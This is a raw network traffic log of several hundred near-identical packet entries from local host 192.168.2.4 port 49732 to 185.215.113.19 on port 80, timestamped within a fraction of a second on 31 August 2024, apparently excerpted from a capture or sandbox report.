Aug 31, 2024 22:41:57.670116901 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670135975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670154095 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670171976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670180082 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670208931 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670231104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670239925 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670321941 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670331955 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670356035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670377016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670392990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670440912 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670454979 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670479059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670526028 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670547009 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670569897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670588017 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670610905 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670660973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670674086 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670696974 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670717001 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670726061 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670752048 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670763016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670911074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670933962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670953035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670974016 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.670991898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671010971 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671029091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671041012 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671066046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671086073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671097040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671118975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671128988 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671207905 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671217918 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671242952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671288013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671312094 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671329021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671349049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671361923 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671417952 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671432018 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671452045 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671510935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671510935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671523094 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671545029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671562910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671581984 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671595097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671727896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671749115 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671766043 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671780109 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671801090 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671814919 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671838999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671858072 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671870947 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671892881 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671905041 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671924114 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671946049 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.671962976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672039986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672048092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672075033 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672094107 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672143936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672153950 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672175884 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672197104 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672239065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672260046 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672272921 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672291040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672339916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672353983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672377110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672390938 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672413111 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672429085 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672600031 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672609091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672609091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672615051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672663927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672739029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672771931 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672827005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672856092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.672971010 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673053980 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673078060 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673099995 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673120022 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673142910 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673167944 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673190117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673213005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673238993 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673260927 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673417091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673440933 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673634052 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673674107 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673686028 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673743963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673758030 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673779011 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673799038 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673811913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673835993 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.673851013 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674031973 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674052954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674067974 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674093962 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674113035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674129963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674149990 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674168110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674189091 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674204111 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674216032 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674235106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674257040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674269915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674290895 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674379110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674398899 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674411058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674479008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674500942 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674518108 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674586058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674586058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674597025 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674611092 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674633026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674680948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674696922 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674715042 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674727917 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674750090 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674762964 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674911022 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674936056 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674952030 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674973011 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.674993038 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675002098 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675021887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675041914 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675055027 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675076008 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675092936 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675111055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675128937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675198078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675221920 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675240040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675313950 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675313950 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675323963 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675345898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675399065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675411940 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675434113 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675450087 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675493956 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675513983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675524950 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675546885 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675564051 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675586939 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675726891 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675743103 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675760984 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675776005 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675796986 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675815105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675829887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675843954 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675862074 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675880909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675894022 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675915003 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675930977 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.675952911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676029921 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676043034 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676065922 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676081896 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676135063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676146984 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676167011 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676181078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676229000 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676250935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676261902 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676285982 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676295996 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676352024 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676374912 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676395893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676413059 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676425934 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676448107 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676465034 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676593065 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676608086 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676628113 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676646948 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676657915 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676676989 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676696062 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676722050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676732063 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676750898 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676772118 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676789999 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676800966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676881075 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676894903 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676918983 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676930904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.676981926 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677002907 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677020073 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677038908 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677057028 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677073956 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677090883 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677140951 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677160978 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677182913 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677198887 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677248001 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677267075 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677279949 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677299976 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677311897 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677333117 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677350998 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677479029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677499056 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677511930 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677539110 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677547932 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677572966 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677589893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677608967 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677615881 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677639961 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677656889 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677669048 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677690029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677704096 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677723885 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677793980 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677815914 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677834034 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677849054 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677902937 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677920103 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677936077 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.677958965 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678014040 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678014994 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678025007 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678049088 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678062916 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678112984 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678126097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678147078 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678167105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678186893 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678323984 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678323984 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678340912 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678359985 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678378105 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678388119 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678409100 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678421021 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678443909 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678456068 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678478003 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678491116 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678513050 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678528070 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678615093 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678632975 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678651094 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678673029 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678685904 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678708076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678723097 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678776026 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678785086 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678807974 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678867102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678867102 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678889036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678901911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678924084 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678940058 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.678993940 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.679013968 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.679024935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.679042101 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.679064035 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.679081917 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.679094076 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.679112911 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.679166079 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.679186106 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.679203033 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.679222107 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.679235935 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.679254055 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.679275036 CEST	49732	80	192.168.2.4	185.215.113.19
Aug 31, 2024 22:41:57.679289103 CEST	49732	80	192.168.2.4	185.215.113.19
